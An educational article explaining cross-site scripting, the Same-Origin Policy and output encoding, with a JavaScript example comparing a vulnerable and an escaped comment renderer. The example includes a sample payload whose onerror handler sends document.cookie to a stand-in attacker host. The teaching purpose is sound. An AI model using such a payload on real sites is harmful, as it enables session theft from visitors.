
What is cross-site scripting (XSS)?

Cross-site scripting (XSS) is a client-side injection attack: the attacker gets a vulnerable website to include their malicious script in a page it serves, so the victim's browser runs that script as if it were part of the site.

XSS attacks target websites that echo attacker-controlled input back into their pages. When a victim visits the affected page, the injected script runs in their browser with the privileges of the vulnerable site, which lets the attacker act as the victim. Anything the site exposes to script in that browser (session cookies not marked HttpOnly, page content, form data, requests sent with the victim's session) is available to the attacker, who can then perform the same actions the victim could and potentially reach highly sensitive data.


How does cross-site scripting (XSS) work?

The attack sidesteps the Same-Origin Policy (SOP), a fundamental browser security rule that stops script on a page from reading content belonging to a different origin (scheme, host and port). In practice, the policy keeps sites in their own lanes: script from that one random online marketplace you visited cannot read data from your online banking dashboard.

For example, under SOP, script running on https://www.itsecuritycentre.co.uk/index.html can read the content of other pages on the same origin, such as https://www.itsecuritycentre.co.uk/example.html, but not of https://www.facebook.com/example.html.

Attackers get around this restriction not by breaking the policy but by using a cross-site scripting vulnerability to inject their own code into the target website's pages. Because the browser receives that code as part of the site's own page, it runs it with the site's origin rather than treating it as coming from an external source, and SOP grants it the same access the site's legitimate scripts have.


Importantly, this vulnerability exists only on sites that place unvalidated, unencoded user-controlled input into their pages. That covers effectively any site that stores and displays comments, posts, form entries or other user input (stored XSS), as well as sites that echo parts of the request back, such as a search term taken from the URL (reflected XSS), without first encoding the data for the context it is placed in so the browser treats it as text rather than as HTML or script. Simply stripping HTML tags is not a reliable substitute; consistent output encoding is the fix.
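The two points above, an injected script that arrives as part of the site's own page and the unencoded output that lets it in, can be seen in a few lines of server-side rendering code. The following is an added example written for this article, not code from the original page; the comment-rendering functions, the escape helper and the attacker payload are illustrative assumptions. It renders the same user comment once by plain string concatenation and once with HTML output encoding, and includes a crude check for whether the result still contains browser-executable markup.

```javascript
// Added example (not from the original article): a minimal comment renderer
// showing an XSS sink and its fix via HTML output encoding. Function names,
// the page template and the attacker payload are illustrative assumptions.

// Encode the characters that let text break out of an HTML text node or a
// double-quoted attribute value. The browser then shows them as literal text.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: user input is concatenated straight into the page, so any
// markup in the comment becomes part of the site's own document and any
// script in it runs with the site's origin when a victim loads the page.
function renderCommentVulnerable(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Fixed: the same template, but every user-controlled value is encoded for
// the HTML text context it lands in before being placed in the page.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Rough detector for browser-executable content in rendered HTML: a <script>
// tag, or any tag carrying an on* event-handler attribute. For demonstration
// only; a real test would load the page in a browser.
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed attacker input (not a real payload from any site): an image tag
// whose error handler would run in the victim's browser and send the site's
// cookies to an attacker-controlled host.
const attackerComment =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Render the stored comment both ways and report what a visitor would receive.
function demo() {
  const unsafePage = renderCommentVulnerable("mallory", attackerComment);
  const safePage = renderCommentSafe("mallory", attackerComment);
  return {
    unsafePage,
    safePage,
    unsafeHasScript: containsActiveContent(unsafePage),
    safeHasScript: containsActiveContent(safePage),
  };
}

const result = demo();
console.log("vulnerable render:", result.unsafePage);
console.log("encoded render:   ", result.safePage);
```

In the vulnerable render the attacker's tag sits inside the site's own HTML, which is exactly why the browser runs its handler with the site's origin. In the encoded render the same bytes are delivered as `&lt;img ...&gt;` and display as harmless text. Note that the encoding shown is correct for HTML text and double-quoted attribute values only; data placed into a JavaScript string, a URL or a CSS value needs the encoding appropriate to that context.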

© 2019 Tech Bull UK. All Rights Reserved.